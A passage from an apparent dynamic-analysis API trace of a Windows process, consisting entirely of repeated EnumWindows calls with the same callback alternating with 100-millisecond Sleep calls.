EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.679] Sleep (dwMilliseconds=0x64) [0255.682] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.682] Sleep (dwMilliseconds=0x64) [0255.691] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.691] Sleep (dwMilliseconds=0x64) [0255.702] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.702] Sleep (dwMilliseconds=0x64) [0255.714] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.715] Sleep (dwMilliseconds=0x64) [0255.717] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.718] Sleep (dwMilliseconds=0x64) [0255.720] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.720] Sleep (dwMilliseconds=0x64) [0255.727] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.728] Sleep (dwMilliseconds=0x64) [0255.731] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.731] Sleep (dwMilliseconds=0x64) [0255.733] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.733] Sleep (dwMilliseconds=0x64) [0255.739] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.740] Sleep (dwMilliseconds=0x64) [0255.742] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.742] Sleep (dwMilliseconds=0x64) [0255.744] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.744] Sleep (dwMilliseconds=0x64) [0255.746] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.747] Sleep (dwMilliseconds=0x64) [0255.752] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.753] Sleep (dwMilliseconds=0x64) [0255.755] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.755] Sleep (dwMilliseconds=0x64) [0255.758] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.758] Sleep (dwMilliseconds=0x64) [0255.761] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.762] Sleep (dwMilliseconds=0x64) [0255.764] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.764] Sleep (dwMilliseconds=0x64) [0255.766] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.766] Sleep (dwMilliseconds=0x64) [0255.904] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.905] Sleep (dwMilliseconds=0x64) [0255.949] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.949] Sleep (dwMilliseconds=0x64) [0255.968] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.968] Sleep (dwMilliseconds=0x64) [0255.971] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.971] Sleep (dwMilliseconds=0x64) [0255.975] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.975] Sleep (dwMilliseconds=0x64) [0255.977] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.978] Sleep (dwMilliseconds=0x64) [0255.979] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.980] Sleep (dwMilliseconds=0x64) [0255.984] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.984] Sleep (dwMilliseconds=0x64) [0255.986] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.987] Sleep (dwMilliseconds=0x64) [0255.989] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.989] Sleep (dwMilliseconds=0x64) [0255.993] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.993] Sleep (dwMilliseconds=0x64) [0255.995] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.995] Sleep (dwMilliseconds=0x64) [0255.998] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0255.998] Sleep (dwMilliseconds=0x64) [0256.000] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.001] Sleep (dwMilliseconds=0x64) [0256.005] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.005] Sleep (dwMilliseconds=0x64) [0256.007] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.007] Sleep (dwMilliseconds=0x64) [0256.011] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.011] Sleep (dwMilliseconds=0x64) [0256.016] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.016] Sleep (dwMilliseconds=0x64) [0256.018] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.018] Sleep (dwMilliseconds=0x64) [0256.020] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.020] Sleep (dwMilliseconds=0x64) [0256.024] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.025] Sleep (dwMilliseconds=0x64) [0256.026] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.027] Sleep (dwMilliseconds=0x64) [0256.028] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.028] Sleep (dwMilliseconds=0x64) [0256.033] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.034] Sleep (dwMilliseconds=0x64) [0256.036] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.036] Sleep (dwMilliseconds=0x64) [0256.046] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.047] Sleep (dwMilliseconds=0x64) [0256.050] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.050] Sleep (dwMilliseconds=0x64) [0256.055] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.056] Sleep (dwMilliseconds=0x64) [0256.062] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.063] Sleep (dwMilliseconds=0x64) [0256.065] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.066] Sleep (dwMilliseconds=0x64) [0256.069] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.069] Sleep (dwMilliseconds=0x64) [0256.106] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.106] Sleep (dwMilliseconds=0x64) [0256.174] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.174] Sleep (dwMilliseconds=0x64) [0256.192] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.192] Sleep (dwMilliseconds=0x64) [0256.194] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.194] Sleep (dwMilliseconds=0x64) [0256.198] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.199] Sleep (dwMilliseconds=0x64) [0256.201] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.201] Sleep (dwMilliseconds=0x64) [0256.203] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.203] Sleep (dwMilliseconds=0x64) [0256.205] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.206] Sleep (dwMilliseconds=0x64) [0256.208] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.209] Sleep (dwMilliseconds=0x64) [0256.213] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.213] Sleep (dwMilliseconds=0x64) [0256.216] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.216] Sleep (dwMilliseconds=0x64) [0256.218] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.218] Sleep (dwMilliseconds=0x64) [0256.233] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.234] Sleep (dwMilliseconds=0x64) [0256.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.238] Sleep (dwMilliseconds=0x64) [0256.244] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.245] Sleep (dwMilliseconds=0x64) [0256.257] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.257] Sleep (dwMilliseconds=0x64) [0256.261] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.261] Sleep (dwMilliseconds=0x64) [0256.264] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.264] Sleep (dwMilliseconds=0x64) [0256.268] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.269] Sleep (dwMilliseconds=0x64) [0256.271] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.271] Sleep (dwMilliseconds=0x64) [0256.273] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.274] Sleep (dwMilliseconds=0x64) [0256.279] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.280] Sleep (dwMilliseconds=0x64) [0256.281] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.282] Sleep (dwMilliseconds=0x64) [0256.284] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.284] Sleep (dwMilliseconds=0x64) [0256.293] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.294] Sleep (dwMilliseconds=0x64) [0256.333] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.333] Sleep (dwMilliseconds=0x64) [0256.371] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.372] Sleep (dwMilliseconds=0x64) [0256.396] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.396] Sleep (dwMilliseconds=0x64) [0256.400] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.401] Sleep (dwMilliseconds=0x64) [0256.403] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.403] Sleep (dwMilliseconds=0x64) [0256.408] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.409] Sleep (dwMilliseconds=0x64) [0256.411] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.412] Sleep (dwMilliseconds=0x64) [0256.414] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.414] Sleep (dwMilliseconds=0x64) [0256.418] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.418] Sleep (dwMilliseconds=0x64) [0256.427] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.427] Sleep (dwMilliseconds=0x64) [0256.448] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.449] Sleep (dwMilliseconds=0x64) [0256.453] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.453] Sleep (dwMilliseconds=0x64) [0256.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.455] Sleep (dwMilliseconds=0x64) [0256.457] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.457] Sleep (dwMilliseconds=0x64) [0256.459] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.459] Sleep (dwMilliseconds=0x64) [0256.461] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.461] Sleep (dwMilliseconds=0x64) [0256.467] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.468] Sleep (dwMilliseconds=0x64) [0256.478] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.478] Sleep (dwMilliseconds=0x64) [0256.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.481] Sleep (dwMilliseconds=0x64) [0256.483] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.483] Sleep (dwMilliseconds=0x64) [0256.485] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.485] Sleep (dwMilliseconds=0x64) [0256.487] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.488] Sleep (dwMilliseconds=0x64) [0256.491] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.491] Sleep (dwMilliseconds=0x64) [0256.495] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.495] Sleep (dwMilliseconds=0x64) [0256.535] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.536] Sleep (dwMilliseconds=0x64) [0256.578] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.578] Sleep (dwMilliseconds=0x64) [0256.606] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.607] Sleep (dwMilliseconds=0x64) [0256.610] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.610] Sleep (dwMilliseconds=0x64) [0256.613] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.613] Sleep (dwMilliseconds=0x64) [0256.616] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.616] Sleep (dwMilliseconds=0x64) [0256.620] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.620] Sleep (dwMilliseconds=0x64) [0256.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.626] Sleep (dwMilliseconds=0x64) [0256.628] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.629] Sleep (dwMilliseconds=0x64) [0256.630] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.631] Sleep (dwMilliseconds=0x64) [0256.634] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.635] Sleep (dwMilliseconds=0x64) [0256.637] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.637] Sleep (dwMilliseconds=0x64) [0256.639] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.639] Sleep (dwMilliseconds=0x64) [0256.644] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.645] Sleep (dwMilliseconds=0x64) [0256.647] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.648] Sleep (dwMilliseconds=0x64) [0256.650] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.650] Sleep (dwMilliseconds=0x64) [0256.653] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.653] Sleep (dwMilliseconds=0x64) [0256.658] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.658] Sleep (dwMilliseconds=0x64) [0256.663] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.664] Sleep (dwMilliseconds=0x64) [0256.666] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.666] Sleep (dwMilliseconds=0x64) [0256.668] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.668] Sleep (dwMilliseconds=0x64) [0256.671] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.671] Sleep (dwMilliseconds=0x64) [0256.673] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.673] Sleep (dwMilliseconds=0x64) [0256.680] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.680] Sleep (dwMilliseconds=0x64) [0256.683] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.683] Sleep (dwMilliseconds=0x64) [0256.688] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.688] Sleep (dwMilliseconds=0x64) [0256.691] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.691] Sleep (dwMilliseconds=0x64) [0256.693] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.693] Sleep (dwMilliseconds=0x64) [0256.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.701] Sleep (dwMilliseconds=0x64) [0256.704] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.704] Sleep (dwMilliseconds=0x64) [0256.744] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.744] Sleep (dwMilliseconds=0x64) [0256.787] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.788] Sleep (dwMilliseconds=0x64) [0256.815] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.815] Sleep (dwMilliseconds=0x64) [0256.817] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.818] Sleep (dwMilliseconds=0x64) [0256.820] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.820] Sleep (dwMilliseconds=0x64) [0256.824] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.824] Sleep (dwMilliseconds=0x64) [0256.827] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.827] Sleep (dwMilliseconds=0x64) [0256.829] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.829] Sleep (dwMilliseconds=0x64) [0256.833] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.833] Sleep (dwMilliseconds=0x64) [0256.838] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.838] Sleep (dwMilliseconds=0x64) [0256.841] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.844] Sleep (dwMilliseconds=0x64) [0256.845] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.845] Sleep (dwMilliseconds=0x64) [0256.848] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.848] Sleep (dwMilliseconds=0x64) [0256.849] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.850] Sleep (dwMilliseconds=0x64) [0256.851] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.851] Sleep (dwMilliseconds=0x64) [0256.853] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.854] Sleep (dwMilliseconds=0x64) [0256.855] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.855] Sleep (dwMilliseconds=0x64) [0256.856] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.857] Sleep (dwMilliseconds=0x64) [0256.858] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.858] Sleep (dwMilliseconds=0x64) [0256.861] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.862] Sleep (dwMilliseconds=0x64) [0256.863] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.863] Sleep (dwMilliseconds=0x64) [0256.866] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.866] Sleep (dwMilliseconds=0x64) [0256.868] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.868] Sleep (dwMilliseconds=0x64) [0256.870] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.870] Sleep (dwMilliseconds=0x64) [0256.872] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.872] Sleep (dwMilliseconds=0x64) [0256.874] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.874] Sleep (dwMilliseconds=0x64) [0256.876] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.876] Sleep (dwMilliseconds=0x64) [0256.879] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.879] Sleep (dwMilliseconds=0x64) [0256.880] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.881] Sleep (dwMilliseconds=0x64) [0256.882] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.882] Sleep (dwMilliseconds=0x64) [0256.884] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.884] Sleep (dwMilliseconds=0x64) [0256.886] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.886] Sleep (dwMilliseconds=0x64) [0256.888] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.888] Sleep (dwMilliseconds=0x64) [0256.890] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.890] Sleep (dwMilliseconds=0x64) [0256.892] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.892] Sleep (dwMilliseconds=0x64) [0256.893] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.894] Sleep (dwMilliseconds=0x64) [0256.896] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.896] Sleep (dwMilliseconds=0x64) [0256.900] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.900] Sleep (dwMilliseconds=0x64) [0256.902] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.902] Sleep (dwMilliseconds=0x64) [0256.904] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.904] Sleep (dwMilliseconds=0x64) [0256.906] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.906] Sleep (dwMilliseconds=0x64) [0256.908] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.908] Sleep (dwMilliseconds=0x64) [0256.909] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.910] Sleep (dwMilliseconds=0x64) [0256.912] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.912] Sleep (dwMilliseconds=0x64) [0256.913] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.914] Sleep (dwMilliseconds=0x64) [0256.915] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.915] Sleep (dwMilliseconds=0x64) [0256.916] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.917] Sleep (dwMilliseconds=0x64) [0256.918] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.918] Sleep (dwMilliseconds=0x64) [0256.920] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.920] Sleep (dwMilliseconds=0x64) [0256.921] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.922] Sleep (dwMilliseconds=0x64) [0256.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.923] Sleep (dwMilliseconds=0x64) [0256.924] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.925] Sleep (dwMilliseconds=0x64) [0256.926] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.926] Sleep (dwMilliseconds=0x64) [0256.928] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.928] Sleep (dwMilliseconds=0x64) [0256.930] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.930] Sleep (dwMilliseconds=0x64) [0256.932] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.932] Sleep (dwMilliseconds=0x64) [0256.934] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.935] Sleep (dwMilliseconds=0x64) [0256.936] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.936] Sleep (dwMilliseconds=0x64) [0256.939] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.939] Sleep (dwMilliseconds=0x64) [0256.941] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.941] Sleep (dwMilliseconds=0x64) [0256.943] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.943] Sleep (dwMilliseconds=0x64) [0256.945] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.945] Sleep (dwMilliseconds=0x64) [0256.947] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.947] Sleep (dwMilliseconds=0x64) [0256.949] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.949] Sleep (dwMilliseconds=0x64) [0256.951] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.951] Sleep (dwMilliseconds=0x64) [0256.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.953] Sleep (dwMilliseconds=0x64) [0256.954] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.955] Sleep (dwMilliseconds=0x64) [0256.956] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.956] Sleep (dwMilliseconds=0x64) [0256.958] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.958] Sleep (dwMilliseconds=0x64) [0256.959] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.960] Sleep (dwMilliseconds=0x64) [0256.961] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.962] Sleep (dwMilliseconds=0x64) [0256.963] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.963] Sleep (dwMilliseconds=0x64) [0256.965] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.965] Sleep (dwMilliseconds=0x64) [0256.967] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.967] Sleep (dwMilliseconds=0x64) [0256.968] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.969] Sleep (dwMilliseconds=0x64) [0256.970] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.970] Sleep (dwMilliseconds=0x64) [0256.972] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.972] Sleep (dwMilliseconds=0x64) [0256.974] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0256.974] Sleep (dwMilliseconds=0x64) [0257.078] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.079] Sleep (dwMilliseconds=0x64) [0257.188] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.188] Sleep (dwMilliseconds=0x64) [0257.193] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.193] Sleep (dwMilliseconds=0x64) [0257.204] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.204] Sleep (dwMilliseconds=0x64) [0257.210] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.211] Sleep (dwMilliseconds=0x64) [0257.221] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.222] Sleep (dwMilliseconds=0x64) [0257.224] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.225] Sleep (dwMilliseconds=0x64) [0257.233] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.233] Sleep (dwMilliseconds=0x64) [0257.239] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.239] Sleep (dwMilliseconds=0x64) [0257.278] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.278] Sleep (dwMilliseconds=0x64) [0257.321] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.321] Sleep (dwMilliseconds=0x64) [0257.354] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.354] Sleep (dwMilliseconds=0x64) [0257.361] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.361] Sleep (dwMilliseconds=0x64) [0257.364] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.364] Sleep (dwMilliseconds=0x64) [0257.366] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.367] Sleep (dwMilliseconds=0x64) [0257.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.373] Sleep (dwMilliseconds=0x64) [0257.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.375] Sleep (dwMilliseconds=0x64) [0257.379] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.380] Sleep (dwMilliseconds=0x64) [0257.390] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.390] Sleep (dwMilliseconds=0x64) [0257.393] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.394] Sleep (dwMilliseconds=0x64) [0257.397] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.397] Sleep (dwMilliseconds=0x64) [0257.400] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.401] Sleep (dwMilliseconds=0x64) [0257.406] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.407] Sleep (dwMilliseconds=0x64) [0257.413] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.414] Sleep (dwMilliseconds=0x64) [0257.416] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.416] Sleep (dwMilliseconds=0x64) [0257.420] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0257.420] Sleep (dwMilliseconds=0x64) [0257.423] EnumWindows 